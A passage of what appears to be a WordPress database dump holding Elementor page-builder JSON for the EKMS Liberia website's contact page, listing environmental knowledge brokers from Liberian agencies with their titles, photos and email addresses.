:{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\nManager\\nDepartment of Marine Fisheries and Environment\\nNaFAA\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Martin Killen <\\/strong><br \\/>IT Officer<br \\/>NaFAA<br \\/><a href=\\\"mailto:maskillen@nafaa.gov.lr\\\">maskillen@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"625a74e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9bf0510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e162bb8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"593819f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3ef1bd5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"334f9e9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(24407,3598,'_elementor_edit_mode','builder'),(24408,3598,'_elementor_template_type','wp-page'),(24409,3598,'_elementor_version','3.0.16'),(24410,3598,'_wp_page_template','default'),(24411,3598,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/bgoll.jpg\",\"id\":3426}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll<\\/strong><br \\/>Conservation Manager<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\"